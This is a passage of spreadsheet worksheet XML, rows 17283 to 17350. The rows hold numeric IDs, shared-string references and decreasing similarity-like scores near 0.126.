        <v>5.3453089E7</v>
      </c>
      <c r="C17283" s="2" t="s">
        <v>16664</v>
      </c>
      <c r="D17283" s="2">
        <v>1.0</v>
      </c>
      <c r="E17283" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17283" s="2">
        <v>0.1268656716417911</v>
      </c>
    </row>
    <row r="17284" ht="15.75" customHeight="1">
      <c r="A17284" s="1">
        <v>23680.0</v>
      </c>
      <c r="B17284" s="2">
        <v>6958289.0</v>
      </c>
      <c r="C17284" s="2" t="s">
        <v>16665</v>
      </c>
      <c r="D17284" s="2">
        <v>1.0</v>
      </c>
      <c r="E17284" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17284" s="2">
        <v>0.1268518518518519</v>
      </c>
    </row>
    <row r="17285" ht="15.75" customHeight="1">
      <c r="A17285" s="1">
        <v>31683.0</v>
      </c>
      <c r="B17285" s="2">
        <v>5188459.0</v>
      </c>
      <c r="C17285" s="2" t="s">
        <v>16666</v>
      </c>
      <c r="D17285" s="2">
        <v>1.0</v>
      </c>
      <c r="E17285" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17285" s="2">
        <v>0.1268343815513627</v>
      </c>
    </row>
    <row r="17286" ht="15.75" customHeight="1">
      <c r="A17286" s="1">
        <v>8928.0</v>
      </c>
      <c r="B17286" s="2">
        <v>5.4836651E7</v>
      </c>
      <c r="C17286" s="2" t="s">
        <v>16667</v>
      </c>
      <c r="D17286" s="2">
        <v>1.0</v>
      </c>
      <c r="E17286" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17286" s="2">
        <v>0.1265938069216758</v>
      </c>
    </row>
    <row r="17287" ht="15.75" customHeight="1">
      <c r="A17287" s="1">
        <v>18697.0</v>
      </c>
      <c r="B17287" s="2">
        <v>5.3603226E7</v>
      </c>
      <c r="C17287" s="2" t="s">
        <v>16668</v>
      </c>
      <c r="D17287" s="2">
        <v>1.0</v>
      </c>
      <c r="E17287" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17287" s="2">
        <v>0.1265938069216758</v>
      </c>
    </row>
    <row r="17288" ht="15.75" customHeight="1">
      <c r="A17288" s="1">
        <v>24379.0</v>
      </c>
      <c r="B17288" s="2">
        <v>1.0767649E7</v>
      </c>
      <c r="C17288" s="2" t="s">
        <v>16669</v>
      </c>
      <c r="D17288" s="2">
        <v>1.0</v>
      </c>
      <c r="E17288" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17288" s="2">
        <v>0.1265938069216758</v>
      </c>
    </row>
    <row r="17289" ht="15.75" customHeight="1">
      <c r="A17289" s="1">
        <v>28804.0</v>
      </c>
      <c r="B17289" s="2">
        <v>2.8660022E7</v>
      </c>
      <c r="C17289" s="2" t="s">
        <v>16670</v>
      </c>
      <c r="D17289" s="2">
        <v>1.0</v>
      </c>
      <c r="E17289" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17289" s="2">
        <v>0.1265938069216758</v>
      </c>
    </row>
    <row r="17290" ht="15.75" customHeight="1">
      <c r="A17290" s="1">
        <v>3419.0</v>
      </c>
      <c r="B17290" s="2">
        <v>3.8133462E7</v>
      </c>
      <c r="C17290" s="2" t="s">
        <v>16671</v>
      </c>
      <c r="D17290" s="2">
        <v>1.0</v>
      </c>
      <c r="E17290" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17290" s="2">
        <v>0.1265938069216757</v>
      </c>
    </row>
    <row r="17291" ht="15.75" customHeight="1">
      <c r="A17291" s="1">
        <v>17566.0</v>
      </c>
      <c r="B17291" s="2">
        <v>5.0252262E7</v>
      </c>
      <c r="C17291" s="2" t="s">
        <v>16672</v>
      </c>
      <c r="D17291" s="2">
        <v>1.0</v>
      </c>
      <c r="E17291" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17291" s="2">
        <v>0.1263440860215054</v>
      </c>
    </row>
    <row r="17292" ht="15.75" customHeight="1">
      <c r="A17292" s="1">
        <v>25132.0</v>
      </c>
      <c r="B17292" s="2">
        <v>1.301877E7</v>
      </c>
      <c r="C17292" s="2" t="s">
        <v>16673</v>
      </c>
      <c r="D17292" s="2">
        <v>1.0</v>
      </c>
      <c r="E17292" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17292" s="2">
        <v>0.1263440860215054</v>
      </c>
    </row>
    <row r="17293" ht="15.75" customHeight="1">
      <c r="A17293" s="1">
        <v>26254.0</v>
      </c>
      <c r="B17293" s="2">
        <v>1.6339952E7</v>
      </c>
      <c r="C17293" s="2" t="s">
        <v>16674</v>
      </c>
      <c r="D17293" s="2">
        <v>1.0</v>
      </c>
      <c r="E17293" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17293" s="2">
        <v>0.1263440860215054</v>
      </c>
    </row>
    <row r="17294" ht="15.75" customHeight="1">
      <c r="A17294" s="1">
        <v>1912.0</v>
      </c>
      <c r="B17294" s="2">
        <v>3.0019734E7</v>
      </c>
      <c r="C17294" s="2" t="s">
        <v>16675</v>
      </c>
      <c r="D17294" s="2">
        <v>1.0</v>
      </c>
      <c r="E17294" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17294" s="2">
        <v>0.1262626262626262</v>
      </c>
    </row>
    <row r="17295" ht="15.75" customHeight="1">
      <c r="A17295" s="1">
        <v>12408.0</v>
      </c>
      <c r="B17295" s="2">
        <v>2.9055467E7</v>
      </c>
      <c r="C17295" s="2" t="s">
        <v>16676</v>
      </c>
      <c r="D17295" s="2">
        <v>1.0</v>
      </c>
      <c r="E17295" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17295" s="2">
        <v>0.1262626262626262</v>
      </c>
    </row>
    <row r="17296" ht="15.75" customHeight="1">
      <c r="A17296" s="1">
        <v>14222.0</v>
      </c>
      <c r="B17296" s="2">
        <v>3.8283999E7</v>
      </c>
      <c r="C17296" s="2" t="s">
        <v>16677</v>
      </c>
      <c r="D17296" s="2">
        <v>1.0</v>
      </c>
      <c r="E17296" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17296" s="2">
        <v>0.1262626262626262</v>
      </c>
    </row>
    <row r="17297" ht="15.75" customHeight="1">
      <c r="A17297" s="1">
        <v>26400.0</v>
      </c>
      <c r="B17297" s="2">
        <v>1.7022369E7</v>
      </c>
      <c r="C17297" s="2" t="s">
        <v>16678</v>
      </c>
      <c r="D17297" s="2">
        <v>1.0</v>
      </c>
      <c r="E17297" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17297" s="2">
        <v>0.1262626262626262</v>
      </c>
    </row>
    <row r="17298" ht="15.75" customHeight="1">
      <c r="A17298" s="1">
        <v>28870.0</v>
      </c>
      <c r="B17298" s="2">
        <v>2.9120631E7</v>
      </c>
      <c r="C17298" s="2" t="s">
        <v>16679</v>
      </c>
      <c r="D17298" s="2">
        <v>1.0</v>
      </c>
      <c r="E17298" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17298" s="2">
        <v>0.1262626262626262</v>
      </c>
    </row>
    <row r="17299" ht="15.75" customHeight="1">
      <c r="A17299" s="1">
        <v>16281.0</v>
      </c>
      <c r="B17299" s="2">
        <v>4.5796131E7</v>
      </c>
      <c r="C17299" s="2" t="s">
        <v>16680</v>
      </c>
      <c r="D17299" s="2">
        <v>1.0</v>
      </c>
      <c r="E17299" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17299" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="17300" ht="15.75" customHeight="1">
      <c r="A17300" s="1">
        <v>17348.0</v>
      </c>
      <c r="B17300" s="2">
        <v>4.9422658E7</v>
      </c>
      <c r="C17300" s="2" t="s">
        <v>16681</v>
      </c>
      <c r="D17300" s="2">
        <v>1.0</v>
      </c>
      <c r="E17300" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17300" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="17301" ht="15.75" customHeight="1">
      <c r="A17301" s="1">
        <v>18431.0</v>
      </c>
      <c r="B17301" s="2">
        <v>5.2721414E7</v>
      </c>
      <c r="C17301" s="2" t="s">
        <v>16682</v>
      </c>
      <c r="D17301" s="2">
        <v>1.0</v>
      </c>
      <c r="E17301" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17301" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="17302" ht="15.75" customHeight="1">
      <c r="A17302" s="1">
        <v>24028.0</v>
      </c>
      <c r="B17302" s="2">
        <v>9404116.0</v>
      </c>
      <c r="C17302" s="2" t="s">
        <v>16683</v>
      </c>
      <c r="D17302" s="2">
        <v>1.0</v>
      </c>
      <c r="E17302" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17302" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="17303" ht="15.75" customHeight="1">
      <c r="A17303" s="1">
        <v>24524.0</v>
      </c>
      <c r="B17303" s="2">
        <v>1.1168165E7</v>
      </c>
      <c r="C17303" s="2" t="s">
        <v>16684</v>
      </c>
      <c r="D17303" s="2">
        <v>1.0</v>
      </c>
      <c r="E17303" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17303" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="17304" ht="15.75" customHeight="1">
      <c r="A17304" s="1">
        <v>25674.0</v>
      </c>
      <c r="B17304" s="2">
        <v>1.4524655E7</v>
      </c>
      <c r="C17304" s="2" t="s">
        <v>16685</v>
      </c>
      <c r="D17304" s="2">
        <v>1.0</v>
      </c>
      <c r="E17304" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17304" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="17305" ht="15.75" customHeight="1">
      <c r="A17305" s="1">
        <v>25708.0</v>
      </c>
      <c r="B17305" s="2">
        <v>1.4530134E7</v>
      </c>
      <c r="C17305" s="2" t="s">
        <v>16686</v>
      </c>
      <c r="D17305" s="2">
        <v>1.0</v>
      </c>
      <c r="E17305" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17305" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="17306" ht="15.75" customHeight="1">
      <c r="A17306" s="1">
        <v>26688.0</v>
      </c>
      <c r="B17306" s="2">
        <v>1.8132693E7</v>
      </c>
      <c r="C17306" s="2" t="s">
        <v>16687</v>
      </c>
      <c r="D17306" s="2">
        <v>1.0</v>
      </c>
      <c r="E17306" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17306" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="17307" ht="15.75" customHeight="1">
      <c r="A17307" s="1">
        <v>26744.0</v>
      </c>
      <c r="B17307" s="2">
        <v>1.8298106E7</v>
      </c>
      <c r="C17307" s="2" t="s">
        <v>16576</v>
      </c>
      <c r="D17307" s="2">
        <v>1.0</v>
      </c>
      <c r="E17307" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17307" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="17308" ht="15.75" customHeight="1">
      <c r="A17308" s="1">
        <v>27188.0</v>
      </c>
      <c r="B17308" s="2">
        <v>2.0893514E7</v>
      </c>
      <c r="C17308" s="2" t="s">
        <v>16688</v>
      </c>
      <c r="D17308" s="2">
        <v>1.0</v>
      </c>
      <c r="E17308" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17308" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="17309" ht="15.75" customHeight="1">
      <c r="A17309" s="1">
        <v>29504.0</v>
      </c>
      <c r="B17309" s="2">
        <v>3.2708482E7</v>
      </c>
      <c r="C17309" s="2" t="s">
        <v>16689</v>
      </c>
      <c r="D17309" s="2">
        <v>1.0</v>
      </c>
      <c r="E17309" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17309" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="17310" ht="15.75" customHeight="1">
      <c r="A17310" s="1">
        <v>31197.0</v>
      </c>
      <c r="B17310" s="2">
        <v>4921456.0</v>
      </c>
      <c r="C17310" s="2" t="s">
        <v>16690</v>
      </c>
      <c r="D17310" s="2">
        <v>1.0</v>
      </c>
      <c r="E17310" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17310" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="17311" ht="15.75" customHeight="1">
      <c r="A17311" s="1">
        <v>33405.0</v>
      </c>
      <c r="B17311" s="2">
        <v>7717007.0</v>
      </c>
      <c r="C17311" s="2" t="s">
        <v>16634</v>
      </c>
      <c r="D17311" s="2">
        <v>1.0</v>
      </c>
      <c r="E17311" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17311" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="17312" ht="15.75" customHeight="1">
      <c r="A17312" s="1">
        <v>33987.0</v>
      </c>
      <c r="B17312" s="2">
        <v>9404115.0</v>
      </c>
      <c r="C17312" s="2" t="s">
        <v>16683</v>
      </c>
      <c r="D17312" s="2">
        <v>1.0</v>
      </c>
      <c r="E17312" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17312" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="17313" ht="15.75" customHeight="1">
      <c r="A17313" s="1">
        <v>1511.0</v>
      </c>
      <c r="B17313" s="2">
        <v>2.7305636E7</v>
      </c>
      <c r="C17313" s="2" t="s">
        <v>16691</v>
      </c>
      <c r="D17313" s="2">
        <v>1.0</v>
      </c>
      <c r="E17313" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17313" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="17314" ht="15.75" customHeight="1">
      <c r="A17314" s="1">
        <v>2804.0</v>
      </c>
      <c r="B17314" s="2">
        <v>3.534645E7</v>
      </c>
      <c r="C17314" s="2" t="s">
        <v>16692</v>
      </c>
      <c r="D17314" s="2">
        <v>1.0</v>
      </c>
      <c r="E17314" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17314" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="17315" ht="15.75" customHeight="1">
      <c r="A17315" s="1">
        <v>10630.0</v>
      </c>
      <c r="B17315" s="2">
        <v>1.395606E7</v>
      </c>
      <c r="C17315" s="2" t="s">
        <v>16693</v>
      </c>
      <c r="D17315" s="2">
        <v>1.0</v>
      </c>
      <c r="E17315" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17315" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="17316" ht="15.75" customHeight="1">
      <c r="A17316" s="1">
        <v>10704.0</v>
      </c>
      <c r="B17316" s="2">
        <v>1.4906126E7</v>
      </c>
      <c r="C17316" s="2" t="s">
        <v>16694</v>
      </c>
      <c r="D17316" s="2">
        <v>1.0</v>
      </c>
      <c r="E17316" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17316" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="17317" ht="15.75" customHeight="1">
      <c r="A17317" s="1">
        <v>11093.0</v>
      </c>
      <c r="B17317" s="2">
        <v>1.8519628E7</v>
      </c>
      <c r="C17317" s="2" t="s">
        <v>16695</v>
      </c>
      <c r="D17317" s="2">
        <v>1.0</v>
      </c>
      <c r="E17317" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17317" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="17318" ht="15.75" customHeight="1">
      <c r="A17318" s="1">
        <v>11367.0</v>
      </c>
      <c r="B17318" s="2">
        <v>2.1371768E7</v>
      </c>
      <c r="C17318" s="2" t="s">
        <v>16696</v>
      </c>
      <c r="D17318" s="2">
        <v>1.0</v>
      </c>
      <c r="E17318" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17318" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="17319" ht="15.75" customHeight="1">
      <c r="A17319" s="1">
        <v>13111.0</v>
      </c>
      <c r="B17319" s="2">
        <v>3.3576438E7</v>
      </c>
      <c r="C17319" s="2" t="s">
        <v>16697</v>
      </c>
      <c r="D17319" s="2">
        <v>1.0</v>
      </c>
      <c r="E17319" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17319" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="17320" ht="15.75" customHeight="1">
      <c r="A17320" s="1">
        <v>13786.0</v>
      </c>
      <c r="B17320" s="2">
        <v>3656782.0</v>
      </c>
      <c r="C17320" s="2" t="s">
        <v>16698</v>
      </c>
      <c r="D17320" s="2">
        <v>1.0</v>
      </c>
      <c r="E17320" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17320" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="17321" ht="15.75" customHeight="1">
      <c r="A17321" s="1">
        <v>14453.0</v>
      </c>
      <c r="B17321" s="2">
        <v>3.9390514E7</v>
      </c>
      <c r="C17321" s="2" t="s">
        <v>16699</v>
      </c>
      <c r="D17321" s="2">
        <v>1.0</v>
      </c>
      <c r="E17321" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17321" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="17322" ht="15.75" customHeight="1">
      <c r="A17322" s="1">
        <v>14772.0</v>
      </c>
      <c r="B17322" s="2">
        <v>4.0861738E7</v>
      </c>
      <c r="C17322" s="2" t="s">
        <v>16700</v>
      </c>
      <c r="D17322" s="2">
        <v>1.0</v>
      </c>
      <c r="E17322" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17322" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="17323" ht="15.75" customHeight="1">
      <c r="A17323" s="1">
        <v>15815.0</v>
      </c>
      <c r="B17323" s="2">
        <v>4.4258347E7</v>
      </c>
      <c r="C17323" s="2" t="s">
        <v>16701</v>
      </c>
      <c r="D17323" s="2">
        <v>1.0</v>
      </c>
      <c r="E17323" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17323" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="17324" ht="15.75" customHeight="1">
      <c r="A17324" s="1">
        <v>16697.0</v>
      </c>
      <c r="B17324" s="2">
        <v>4.7387187E7</v>
      </c>
      <c r="C17324" s="2" t="s">
        <v>16702</v>
      </c>
      <c r="D17324" s="2">
        <v>1.0</v>
      </c>
      <c r="E17324" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17324" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="17325" ht="15.75" customHeight="1">
      <c r="A17325" s="1">
        <v>16954.0</v>
      </c>
      <c r="B17325" s="2">
        <v>4.8245329E7</v>
      </c>
      <c r="C17325" s="2" t="s">
        <v>16703</v>
      </c>
      <c r="D17325" s="2">
        <v>1.0</v>
      </c>
      <c r="E17325" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17325" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="17326" ht="15.75" customHeight="1">
      <c r="A17326" s="1">
        <v>19430.0</v>
      </c>
      <c r="B17326" s="2">
        <v>5.5685904E7</v>
      </c>
      <c r="C17326" s="2" t="s">
        <v>16704</v>
      </c>
      <c r="D17326" s="2">
        <v>1.0</v>
      </c>
      <c r="E17326" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17326" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="17327" ht="15.75" customHeight="1">
      <c r="A17327" s="1">
        <v>19658.0</v>
      </c>
      <c r="B17327" s="2">
        <v>5.6352036E7</v>
      </c>
      <c r="C17327" s="2" t="s">
        <v>16705</v>
      </c>
      <c r="D17327" s="2">
        <v>1.0</v>
      </c>
      <c r="E17327" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17327" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="17328" ht="15.75" customHeight="1">
      <c r="A17328" s="1">
        <v>20022.0</v>
      </c>
      <c r="B17328" s="2">
        <v>6301089.0</v>
      </c>
      <c r="C17328" s="2" t="s">
        <v>16706</v>
      </c>
      <c r="D17328" s="2">
        <v>1.0</v>
      </c>
      <c r="E17328" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17328" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="17329" ht="15.75" customHeight="1">
      <c r="A17329" s="1">
        <v>20342.0</v>
      </c>
      <c r="B17329" s="2">
        <v>1.1607948E7</v>
      </c>
      <c r="C17329" s="2" t="s">
        <v>16707</v>
      </c>
      <c r="D17329" s="2">
        <v>1.0</v>
      </c>
      <c r="E17329" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17329" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="17330" ht="15.75" customHeight="1">
      <c r="A17330" s="1">
        <v>20902.0</v>
      </c>
      <c r="B17330" s="2">
        <v>1.6269935E7</v>
      </c>
      <c r="C17330" s="2" t="s">
        <v>16708</v>
      </c>
      <c r="D17330" s="2">
        <v>1.0</v>
      </c>
      <c r="E17330" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17330" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="17331" ht="15.75" customHeight="1">
      <c r="A17331" s="1">
        <v>21152.0</v>
      </c>
      <c r="B17331" s="2">
        <v>1.8834524E7</v>
      </c>
      <c r="C17331" s="2" t="s">
        <v>16709</v>
      </c>
      <c r="D17331" s="2">
        <v>1.0</v>
      </c>
      <c r="E17331" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17331" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="17332" ht="15.75" customHeight="1">
      <c r="A17332" s="1">
        <v>21493.0</v>
      </c>
      <c r="B17332" s="2">
        <v>2.3061174E7</v>
      </c>
      <c r="C17332" s="2" t="s">
        <v>16710</v>
      </c>
      <c r="D17332" s="2">
        <v>1.0</v>
      </c>
      <c r="E17332" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17332" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="17333" ht="15.75" customHeight="1">
      <c r="A17333" s="1">
        <v>21607.0</v>
      </c>
      <c r="B17333" s="2">
        <v>2.4360805E7</v>
      </c>
      <c r="C17333" s="2" t="s">
        <v>16711</v>
      </c>
      <c r="D17333" s="2">
        <v>1.0</v>
      </c>
      <c r="E17333" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17333" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="17334" ht="15.75" customHeight="1">
      <c r="A17334" s="1">
        <v>22065.0</v>
      </c>
      <c r="B17334" s="2">
        <v>3.0548779E7</v>
      </c>
      <c r="C17334" s="2" t="s">
        <v>16712</v>
      </c>
      <c r="D17334" s="2">
        <v>1.0</v>
      </c>
      <c r="E17334" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17334" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="17335" ht="15.75" customHeight="1">
      <c r="A17335" s="1">
        <v>23636.0</v>
      </c>
      <c r="B17335" s="2">
        <v>6649179.0</v>
      </c>
      <c r="C17335" s="2" t="s">
        <v>16713</v>
      </c>
      <c r="D17335" s="2">
        <v>1.0</v>
      </c>
      <c r="E17335" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17335" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="17336" ht="15.75" customHeight="1">
      <c r="A17336" s="1">
        <v>25079.0</v>
      </c>
      <c r="B17336" s="2">
        <v>1.28818E7</v>
      </c>
      <c r="C17336" s="2" t="s">
        <v>16714</v>
      </c>
      <c r="D17336" s="2">
        <v>1.0</v>
      </c>
      <c r="E17336" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17336" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="17337" ht="15.75" customHeight="1">
      <c r="A17337" s="1">
        <v>25659.0</v>
      </c>
      <c r="B17337" s="2">
        <v>1.4523187E7</v>
      </c>
      <c r="C17337" s="2" t="s">
        <v>16715</v>
      </c>
      <c r="D17337" s="2">
        <v>1.0</v>
      </c>
      <c r="E17337" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17337" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="17338" ht="15.75" customHeight="1">
      <c r="A17338" s="1">
        <v>26388.0</v>
      </c>
      <c r="B17338" s="2">
        <v>1.7000246E7</v>
      </c>
      <c r="C17338" s="2" t="s">
        <v>16716</v>
      </c>
      <c r="D17338" s="2">
        <v>1.0</v>
      </c>
      <c r="E17338" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17338" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="17339" ht="15.75" customHeight="1">
      <c r="A17339" s="1">
        <v>26760.0</v>
      </c>
      <c r="B17339" s="2">
        <v>1.8450483E7</v>
      </c>
      <c r="C17339" s="2" t="s">
        <v>16717</v>
      </c>
      <c r="D17339" s="2">
        <v>1.0</v>
      </c>
      <c r="E17339" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17339" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="17340" ht="15.75" customHeight="1">
      <c r="A17340" s="1">
        <v>27718.0</v>
      </c>
      <c r="B17340" s="2">
        <v>2.3061173E7</v>
      </c>
      <c r="C17340" s="2" t="s">
        <v>16710</v>
      </c>
      <c r="D17340" s="2">
        <v>1.0</v>
      </c>
      <c r="E17340" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17340" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="17341" ht="15.75" customHeight="1">
      <c r="A17341" s="1">
        <v>28195.0</v>
      </c>
      <c r="B17341" s="2">
        <v>2.5014719E7</v>
      </c>
      <c r="C17341" s="2" t="s">
        <v>16718</v>
      </c>
      <c r="D17341" s="2">
        <v>1.0</v>
      </c>
      <c r="E17341" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17341" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="17342" ht="15.75" customHeight="1">
      <c r="A17342" s="1">
        <v>28652.0</v>
      </c>
      <c r="B17342" s="2">
        <v>2.7357568E7</v>
      </c>
      <c r="C17342" s="2" t="s">
        <v>16719</v>
      </c>
      <c r="D17342" s="2">
        <v>1.0</v>
      </c>
      <c r="E17342" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17342" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="17343" ht="15.75" customHeight="1">
      <c r="A17343" s="1">
        <v>29138.0</v>
      </c>
      <c r="B17343" s="2">
        <v>3.0548778E7</v>
      </c>
      <c r="C17343" s="2" t="s">
        <v>16720</v>
      </c>
      <c r="D17343" s="2">
        <v>1.0</v>
      </c>
      <c r="E17343" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17343" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="17344" ht="15.75" customHeight="1">
      <c r="A17344" s="1">
        <v>29140.0</v>
      </c>
      <c r="B17344" s="2">
        <v>3.0556081E7</v>
      </c>
      <c r="C17344" s="2" t="s">
        <v>16720</v>
      </c>
      <c r="D17344" s="2">
        <v>1.0</v>
      </c>
      <c r="E17344" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17344" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="17345" ht="15.75" customHeight="1">
      <c r="A17345" s="1">
        <v>29406.0</v>
      </c>
      <c r="B17345" s="2">
        <v>3.2035317E7</v>
      </c>
      <c r="C17345" s="2" t="s">
        <v>16721</v>
      </c>
      <c r="D17345" s="2">
        <v>1.0</v>
      </c>
      <c r="E17345" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17345" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="17346" ht="15.75" customHeight="1">
      <c r="A17346" s="1">
        <v>29446.0</v>
      </c>
      <c r="B17346" s="2">
        <v>3.222131E7</v>
      </c>
      <c r="C17346" s="2" t="s">
        <v>16722</v>
      </c>
      <c r="D17346" s="2">
        <v>1.0</v>
      </c>
      <c r="E17346" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17346" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="17347" ht="15.75" customHeight="1">
      <c r="A17347" s="1">
        <v>30912.0</v>
      </c>
      <c r="B17347" s="2">
        <v>4.677977E7</v>
      </c>
      <c r="C17347" s="2" t="s">
        <v>16723</v>
      </c>
      <c r="D17347" s="2">
        <v>1.0</v>
      </c>
      <c r="E17347" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17347" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="17348" ht="15.75" customHeight="1">
      <c r="A17348" s="1">
        <v>32072.0</v>
      </c>
      <c r="B17348" s="2">
        <v>5379478.0</v>
      </c>
      <c r="C17348" s="2" t="s">
        <v>16724</v>
      </c>
      <c r="D17348" s="2">
        <v>1.0</v>
      </c>
      <c r="E17348" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17348" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="17349" ht="15.75" customHeight="1">
      <c r="A17349" s="1">
        <v>33097.0</v>
      </c>
      <c r="B17349" s="2">
        <v>6958288.0</v>
      </c>
      <c r="C17349" s="2" t="s">
        <v>16725</v>
      </c>
      <c r="D17349" s="2">
        <v>1.0</v>
      </c>
      <c r="E17349" s="3" t="s">
        <v>15755</v>
      </c>
      <c r="F17349" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="17350" ht="15.75" customHeight="1">
      <c r="A17350" s="1">
        <v>33233.0</v>
      </c>
      <c r="B17350" s="2">
        <v>7287463.0</v>
      </c>
